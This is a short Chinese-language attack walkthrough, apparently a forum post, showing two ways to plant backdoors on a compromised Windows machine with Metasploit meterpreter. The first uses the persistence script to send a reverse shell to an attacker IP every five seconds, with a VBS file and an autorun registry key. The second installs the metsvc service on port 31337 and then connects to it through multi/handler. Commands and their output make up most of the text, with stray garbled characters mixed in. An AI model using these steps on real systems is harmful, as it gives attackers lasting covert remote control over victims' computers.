安裝后門方法一:
meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108
Persistent agent script is 609628 bytes long
RunningPersistance Script
Resource filefor cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
CreatingPayload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[+] PersistentScript written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs Starting the service...
Executingscript C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agentexecuted with PID 1888
Installing intoautorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installedinto autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
^9 b5 q" j
然后它就在目標機的C:/windows/Temp/下建立一個vbs文件,開機會啟動這個文件上面的vbs的確存在
注釋,反彈時間間隔是5s 端口是443 Metasploit服務器Ip是192.168.0.108,缺點是容易被殺毒軟件查殺|9 y$ t
3 X' c d)W l$ s
安裝后門方法二:
meterpreter >run metsvc
Creating ameterpreter service on port 31337
Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...
>>Uploading metsrv.dll...
>>Uploading metsvc-server.exe...
>>Uploading metsvc.exe...
* Installingservice metsvc
* Startingservice
Service metsvcsuccessfully installed.
meterpreter>
后門如何利用啊?
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
msf exploit(handler) > set RHOST 192.168.200.140
msf exploit(handler)> exploit